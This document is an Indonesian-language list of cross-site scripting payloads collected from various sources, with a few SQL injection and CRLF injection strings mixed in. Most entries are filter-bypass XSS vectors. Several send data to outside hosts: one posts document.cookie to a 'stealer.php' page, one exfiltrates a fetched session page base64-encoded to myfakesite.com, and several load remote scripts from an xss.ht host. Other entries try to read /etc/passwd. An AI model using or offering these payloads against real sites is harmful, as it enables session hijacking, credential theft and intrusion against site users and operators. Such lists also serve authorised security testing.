
### PAYLOAD XSS ### 
PAYLOAD INI DIDAPATKAN DARI BERBAGAI SUMBER YANG DITEMUKAN OLEH PENULIS
TOLONG DOAKAN PENULIS DAN PEMILIK PAYLOAD YANG PENULIS DAPATKAN DARI SUMBER MANAPUN, 
SEMOGA BERKAH DAN MEMBAWA MANFAAT SELALU

%22%3E%3Cimg%20src=faw%20onerror=alert(1)%3E

%22%3E%3Cimg%20src=fwa%20onerror=alert(1)%3E

&quot&gtsadf&lt/a&gt&ltimg&#32src=&quotxxx&quotonerror=&quotfetch&#40&#39https&#58&#47&#47www.sidefx.com/account/sessions&#39&#41.then&#40response=&gt&#123response.text&#40&#41.then&#40ddd=&gt&#123let&#32el=document.createElement&#40&#39img&#39&#41&#59el.src=&#39http&#58&#47&#47myfakesite.com?q=&#39&#43btoa&#40encodeURIComponent&#40ddd&#41&#41&#59document.body.appendChild&#40el&#41&#125&#41&#125&#41&quot&gt

"nama":"test\"><img/src/onerror=alert`Test`>"

{"type":"null","html":"<img/src/onerror=alert`Test`>"}

#"><img src=x onerror=prompt(1);>

<a href="j&#97v&#97script&#x3A;&#97lert(document.cookie)">ClickMe

http://aaa#'><img onerror=alert(location) src=.>

<h1>testing</h1> ----> try this html tag first (if platform vulnerable with html injection, it has possibility to XSS Vulnerbility)
-----------------------------------------------------------------------

 "></div><a/href="j&Tab;a&Tab;v&Tab;asc&Tab;ri&Tab;pt:alert&lpar;document.cookie&rpar;">

<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ==")>

<svg><style><script>alert(1)</script></style></svg>

<math><style><img src onerror=alert(2)></style></math>

'"`><img src=x>${{7*7}}

<script>document.write(document.domain)</script>

xss&lt;script&gt;alert&#40;1337&#41;&lt;&#47;script&gt

{{"<script>alert(123)</script>"}}

"/></a></><img src=x onerror=alert(1);>

<a&#32;href&#61;&#91;&#63;&#93;"&#63; onmouseover=prompt&#40;1&#41;&#47;#47;">sss</a

 "><svg/onload=alert(document.domain)>

<script>document.write('<iframe src=file:///etc/passwd></iframe>');</scrip>

<img src="testing" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>

%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fzhirosec.xss.ht%3E%3C%2Fscript%3E

<script>alert(111);</script>zhirow

“><img src=x onerror=write(document.domain)>

---"><script src=//zhirosec.xss.ht></script>---

test"><body %00 onControl hello onmouseleave=confirm(cookie) x>XSS

test"><html><select %00 onControl onpointerenter=prompt(cookie) hello>

test"><input %00 onControl hello oninput=confirm(cookie) x>

"><script src=https://zhirosec.xss.ht></script>

</script><script>alert(document.domain)</script>

<Img Src=\" OnError=alert(1)//\">

<xhzeem/x=" onmouseover=eva&#x6c;?.(id+/(document.domain)/.source) id=confirm>

)%20AN<>D%201=(SE<>LECT%201%20FR<>OM%20PG_SLE<>EP(5))%20AN<>D%20(1=1

<svg on onload=(alert)(document.cookie)>

{{define "T1"}}<script>alert(1)</script>{{end}} {{template "T1"}} ===> golang xss
 
<!--><svg+onload=%27top[%2fal%2f%2esource%2b%2fert%2f%2esource](document.cookie)%27>

<Svg%2Fonload%3Dalert(document.domain)>

<svg+onload=%27top[%2fal%2f%2esource%2b%2fert%2f%2esource](document.cookie)%27>

<!--><svg onload='top[/al/.source+/ert/.source](document.cookie)'>

javascri%0Dpt:alert/**/(1)<svg onload=alert(document.domain)>

abc"><svg+onload=confirm(document.domain)>

abc"><svg+onload=confirm(document.domain)>

<script>alert(1)</script>

<script>alert("xss bug input search by zhirobyte")</script>

"><img src=x onerror=prompt(document.cookie)>

1%27/**/%256fR/**/50%2521%253D22%253B%2523

<svg onload=prompt%26%230000000040document.domain)>

<svg onload=prompt%26%23x000000028;document.domain)>

<script type="text/javascript">
document.location='https://zhirobyte.000webhostapp.com/stealer.php?c='+document.cookie;</script>

<script type="text/javascript">

<img src=x onerror=$.getScript(String.fromCharCode(47,47,120,111,114,46,99,99))></script>

javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie

“><a href=”#” onmouseleave=alert(test)>Click

<svg%20onload=alert(document.cookie)><"x

1%27/**/%256fR/**/50%2521%253D22%253B%2523 

%0d%0aContent-Type:%20text/html%0d%0a%0d%0a<html><script>alert(document.cookie)</script><!-- 

%22%3E%3Csvg%2Fonload%3Dalert%281%29%3E%2A%27%2F

">'><script>alert(document.domain)</script>

%22%3E%3Csvg%2Fonload%3Dalert%281%29%3E%2A%27%2F

%3Ciframe%20src=%22javascript:alert(document.domain)%22%3E%3C/iframe%3E

test+(<script>alert(0)</script>)@domain.com

test@domain(<script>alert(0)</script>).com

"<script>alert(0)</script>"@domain.com

<input type="text" value='' <div/autofocus/onfo<!--esi-->cus='a<!--esi-->lert("test")'>x</div>

“> <img src = x onerror = javascript: alert (1); 
-----------------------------------------------------------------------
 
